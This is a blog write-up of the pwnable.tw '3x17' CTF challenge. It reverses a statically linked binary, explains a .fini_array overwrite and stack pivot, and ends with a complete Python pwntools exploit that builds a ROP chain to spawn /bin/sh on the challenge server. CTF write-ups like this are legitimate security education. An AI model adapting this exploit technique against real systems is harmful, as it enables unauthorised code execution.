Writeup for Pwnable.tw #4

Introduction

Last reversing CTF was so much fun, I started directly with the next challenge. For me, it was a very hard one and it took me several weeks (although I recognized, after reading other peoples solutions my approach was far too complex ;). Nevertheless, it is still interesting and I want to describe the details in this blog article.

The task in general: You get the url of a service, the corresponding binary “3×17” for download and your mission is to spawn a shell.

Static Analysis

Lets take a look at the binary and its import table:

belial@anubis:~/Dropbox/pwnable.tw/4$ objdump -T 3x17

3x17:     file format elf64-x86-64

objdump: 3x17: not a dynamic object
DYNAMIC SYMBOL TABLE:
no symbols

It is statically linked and does not import any external functionality. This leads to a size of 700kb and lots of potential ROP gadgets :).

Next stop: Its security features.

$ checksec 3x17
[*] '/home/belial/3x17'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

Checksec claims there is no canary. Stack isn’t executable and protected by ASLR.

Best guess: We have to find the stack address and overwrite it with a set of ROP gadgets to spawn a shell.

Behaviour

When you run the binary, you get something like this:

belial@anubis:~/Dropbox/pwnable.tw/4$ ./3x17 
addr:123
data:456
belial@anubis:~/Dropbox/pwnable.tw/4$ 456

It asks for an address and for data. Presumably, we can use it to alter memory locations and dont have to look for a write exploit ourselves. Unfortunatly something is wrong, the data input is rejected and redirected to our shell. Therefore, we start Ghidra to check the binaries parsing functionality and to learn how to handle it correctly.

Input Parser

Both strings “addr:” and “data:” are hardcoded into the binaries data segment and have only one reference. This leads us to the following function:

ulong FUN_00401b6d(void)

{
  int iVar1;
  ulong uVar2;
  long in_FS_OFFSET;
  undefined local_28 [24];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  DAT_004b9330 = DAT_004b9330 + 1;
  uVar2 = (ulong)DAT_004b9330;
  if (DAT_004b9330 == 1) {
    FUN_00446ec0(1,"addr:",5);
    FUN_00446e20(0,local_28,0x18);
    iVar1 = FUN_0040ee70(local_28);
    FUN_00446ec0(1,"data:",5);
    FUN_00446e20(0,(long)iVar1,0x18);
    uVar2 = 0;
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    FUN_0044a3e0();
  }
  return uVar2;
}

Obvisiously, it contains a stack protection which terminates the program upon return address manipulation. So, our initial “checksec” command was wrong. Furthermore, the function has a counter and the main body is only executed if it equals to one. Luckily, it is based on a byte which would overflow quite fast ;). Besides this:

  • FUN_00446ec0() writes “addr:” on screen.
  • FUN_00446e20() reads 24 bytes into a buffer.
  • FUN_0040ee70() parses the result and stores it in eax.
  • FUN_00446ec0() writes “data:” on screen.
  • FUN_00446e20() reads 24 bytes and stores them at the previously parsed address.

Unfortunatly, buffer size, read() and write() length are hardcoded. We can not exploit much here. Therefore, we take a look at FUN_0040ee70(). Maybe it is possible to leak a stack address somehow.

Besides the usual function prolog, several registers are initialized with static values which are not altered but still used for branching. A good example is rdx:

mov     edx, 0Ah
;...
cmp     edx, 1
jz      loc_40FEE8
cmp     edx, 24h
ja      loc_40FEE8

This code would jump to loc_40FEE8 if rdx is not between 1h and 24h. Because of the registers static nature, this will never happen but makes reading more difficult. Therefore, we use IDA and its debugger to see directly which branch is taken.

The function starts with the following lookup table access:

test    byte ptr [rcx+rax*2+1], 20h
jz      short loc_40FD92

loc_40FD80:
add     rbx, 1
movsx   rax, byte ptr [rbx]
mov     rsi, rax
test    byte ptr [rcx+rax*2+1], 20h
jnz     short loc_40FD80

loc_40FD92:
;...

Rcx contains a pointer to a lookup table. Rax is the first character and Rbx a pointer to the input string. Taking a closer look at the lookup table leads to the following conclusion: This code skips the first bytes if they are equal to carriage return, new line, etc. Not very difficult to understand but hard to read when you take a look at the disassembly for the first time.

Afterwards, the algorithm checks whether the input string starts with a “+” or a “-“. It seems, unary operators are supported for the specified memory address. Next, garbage code performs branches on static variables. Finally, the following opcodes are executed:

loc_40FE49:
lea     edi, [rsi-30h]
cmp     dil, 9
jbe     short loc_40FE6E
        
loc_40FE6E:
movzx   esi, dil
cmp     esi, edx
jge     short loc_40FE98
        
;...

Rsi contains the current input character, Rdx equals to 0ah. It checks whether it is a digit between 30h and 39h. If it is not a digit, lookup tables are used to check whether it is a letter, upper case is transformed into lower case, etc. but in the end the function terminates. If it is a digit, the following code is executed:

loc_40FE29:
imul    rax, r15
movzx   edi, dil
mov     rsi, r8
add     rax, rdi

Rax contains the function return value and is initialized with 0x00. Dil is the current character-30h. R15 holds 0ah. The algorithm multiplicates the previously parsed value with 10 and adds the last character. This repeats until the input string ends with a 0x00.

Fini_array Section

The current situation: We can enter a decimal value. It is translated into an address and 24 bytes are written to it. The parsing algorithm seems secure. It rejects everything which is not a digit (although in a complicated way with garbage code, lookup tables, allows unary operators, etc.). So we face three problems here:

  • Wrinting 24 bytes to an address of our choice is not enough for a ROP chain.
  • 24 bytes would be enough for a shell code but no executable section is writable.
  • We write into a static buffer and can not exploit the parser to give us the stack address.

At this point, I was rather stuck. I debugged the whole binary to find other exploitable parts but without success. The only interesting aspect: Before termination, the application loaded function pointers from the data segment and called them. A friend gave me an important hint: Check the binaries section and read about “fini_array”.

readelf -S 3x17
There are 29 section headers, starting at offset 0xb94e8:

Section Headers:
  [Nr] Name              Type             Address           Offset
       Size              EntSize          Flags  Link  Info  Align
...
  [16] .fini_array       FINI_ARRAY       00000000004b40f0  000b30f0
       0000000000000010  0000000000000008  WA       0     0     8
  [17] .data.rel.ro      PROGBITS         00000000004b4100  000b3100
       0000000000002df4  0000000000000000  WA       0     0     32

This special section contains a list of function pointers which are called upon termination to clean things up. As you can see, the section is writable and includes two pointers with a total size of 16 bytes. We overwrite them the following way:

  • First Pointer becomes FUN_00401b6d() which reads again user input and writes to memory.
  • Second pointer gets the .fini_array callee loop code.

At this point the whole application runs in an infinite loop and gives us an important advantage: We can write a multiple of 24 bytes. Next open tasks:

  • Write a ROP chain into memory.
  • Change stack address to the rop chain and trigger a return statement.

A ROP chain is trivial. The tool ROPGadget finds a set of opcodes and their addresses in memory which can be used to invoke exec() for “/bin/sh”. Behind .fini_array is a huge chunk of .data_rel.ro. It is writable as well and we use it to store our ROP chain addresses. Finally, we have to change Esp to execute the gadgets. Therefore, let’s take a look at the code which executes the .fini_array function pointers:

sub_402960 proc near

;...
lea     rbp, off_4B40F0
mov     rbx,1

;...      
loc_402988:
call    qword ptr [rbp+rbx*8+0]
sub     rbx, 1
cmp     rbx, 0FFFFFFFFFFFFFFFFh
jnz     short loc_402988

;...
ret

Obvisiously, Rbp contains the base address of .fini_array. Rbx is used as an index for the function pointers. It is initialized with 1 and decremented by each iteration. Luckily, 3×17 contains the following ROP gadget:

0x00000000004715ec : mov bl, 0x48 ; mov eax, edx ; ret

If we write 0x4715ec into the fini_array, Ebx will contain 0x48. The operation enlarges the fini_array to a total size of 71 pointers which start at address 0x4b4328. This gives us plenty of space for ROP gadgets which can be executed for the final task: Set a new Esp. To do so, the following two gadgets are neccessary:

0x000000000048a578 : mov rax, qword ptr [rsi + 8] ; ret
0x000000000044f62b : xchg eax, esp ; ret

Basically, these opcodes copy [rsi+8] into Rax and assign Eax to Esp. Luckily, when the fini_array loop starts, esi points to 0x004b40f8 which is the end of the fini_array section. Therefore, rsi+8 corresponds to the first bytes of the following .data.rel.ro section. As we previously mentioned, this section is writable and already contains the ROP chain which starts the shell. We write the address of the ROP chain to the beginning of the section, set the new Esp and a shell pops up :).

Conclusion

As mentioned in the introduction, this exploit is maybe a little bit too complicated. Nevertheless, it works ;). So lets summarize:

  • Start an infinite loop to break the 24 byte write limitation.
  • Write the ROP chain to .data.rel.ro+8
  • Write the ROP chain start address to .data.rel.ro.
  • Write stack change ROP gadgets to 0x004b4328.
  • Increase Ebx, trigger the stack change code and start the shell.

This is the corresponding Python exploit:

#!/usr/bin/python3
# coding: utf-8

def convert_address(addr):
    return bytes(str(addr).encode('ascii'))

def write_24_bytes(addr, payload):
    conn.recv(5)
    conn.sendline(addr)
    conn.recv(5)
    conn.send(payload)

def main():
    # create infinite main() loop
    infinite_loop_payload = p64(0x402960) + p64(0x401b6d) + p64(0x0)
    write_24_bytes(convert_address(0x4B40F0), infinite_loop_payload)

    # -----------------------------------------------
    # write rop chain on new stack address 0x4b4108 which spawns a shell
    shell_payload_0 = p64(0x406c30) + p64(0x4b70e0) + p64(0x41e4af)
    write_24_bytes(convert_address(0x4B4108), shell_payload_0)

    shell_payload_1 = bytes('/bin//sh'.encode('ascii'))\
        + p64(0x47c1b1) + p64(0x406c30) 
    write_24_bytes(convert_address(0x4B4120), shell_payload_1)

    shell_payload_2 = p64(0x4b70e8) + p64(0x442110) + p64(0x47c1b1) 
    write_24_bytes(convert_address(0x4B4138), shell_payload_2)

    shell_payload_3 = p64(0x401696) + p64(0x4b70e0) + p64(0x406c30)
    write_24_bytes(convert_address(0x4B4150), shell_payload_3)

    shell_payload_4 = p64(0x4b70e8) + p64(0x446e35) + p64(0x4b70e8)
    write_24_bytes(convert_address(0x4B4168), shell_payload_4)

    shell_payload_5 = p64(0x420a80) + p64(0x471821) + p64(0x471821)
    write_24_bytes(convert_address(0x4B4180), shell_payload_5)
    # rax == 0x1c == 28, we need rax== 0x3b == 59, so we have to add 31

    #eax+=3
    shell_payload_6 = p64(0x471821) + p64(0x471821) + p64(0x471821)
    write_24_bytes(convert_address(0x4B4198), shell_payload_6)
    write_24_bytes(convert_address(0x4B41B0), shell_payload_6)
    write_24_bytes(convert_address(0x4B41C8), shell_payload_6)

    shell_payload_7 = p64(0x471821) + p64(0x471810) + p64(0x4022b4)
    write_24_bytes(convert_address(0x4B41E0), shell_payload_7)
    # -----------------------------------------------

    # write rop which change esp to 0x4b4108
    stack_setter_payload = p64(0x44f62b) + p64(0x48a578) + p64(0x0)
    write_24_bytes(convert_address(0x4B4320), stack_setter_payload)
    
    # write address for ebx increase
    # which finally triggers esp changer code
    ebx_inc_payload = p64(0x4715ec) + p64(0x4b4108) + p64(0x406c30) 
    write_24_bytes(convert_address(0x4B40F8), ebx_inc_payload)

from pwn import *
#context.log_level = 'DEBUG'
conn = remote('chall.pwnable.tw',10105)
print("Overwriting finit array with ROP chain...")
main()
print("Done, Shell should pop up :)")
conn.interactive()

You might be interested in …